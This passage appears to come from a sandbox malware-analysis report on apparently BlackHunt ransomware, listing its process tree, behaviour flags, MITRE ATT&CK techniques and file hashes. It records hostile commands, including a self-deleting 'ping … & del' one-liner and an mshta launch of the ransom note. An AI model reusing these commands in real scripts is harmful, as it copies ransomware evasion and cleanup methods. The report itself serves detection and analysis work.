C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:16996 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:13420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13420 -s 14564⤵
- Program crash
PID:11556
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe"2⤵PID:13748
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:16500
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:4752
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10480
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:11504
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5716
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 13420 -ip 134201⤵PID:13572
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD513ddbf0f9cc1807071e7f885174f65b2
SHA11e0415ce683c0144e555fcb311f20987944c2470
SHA256731606e0882219132b34ec95255c96a688d2fa0a755709c0266b0d4b7c2f8ccd
SHA512d8f7f49642d2138331a841edb7c3a44ec037052f298c64e90c3801eb04464f47f8a562634a70576f64383b8c21f1e47e4afe2821e23d2488bea6a34d730586f4
-
Filesize
12KB
MD5af611b4a7d198afa5bea113a74b9a801
SHA10f4e6ea8e59fc3776dff327a5ee1e937c3583f7f
SHA2561936dbbbeb8965c6c1bb25529d038a77d1874912d697330cb627d77236c832bd
SHA512d35127a20c093b0fea80cd0c54b8fbfd4f33798d64571db1a3267b8b62da378194c8bda2a8f3d2824c329546589d174f008eeb10265566244a2e3763d03b6ee4
-
Filesize
684B
MD541cfbb8c7c3861738d70500154f755a1
SHA1b578b4f6a229b8533e523cfe04dd0dc88adb6966
SHA2568442b404dd26a2ad7a182275dbc9c44f91661ebcc355df59de4a7a6799925347
SHA5123d2af51b45f06df1a8820dc4c92c3862ff9b63302d5cc4cddade80dc26d61c5fd4668c1d26650f245d9c76b7b0152f0e9e6b38358212db2cb7df7a53da4ddc17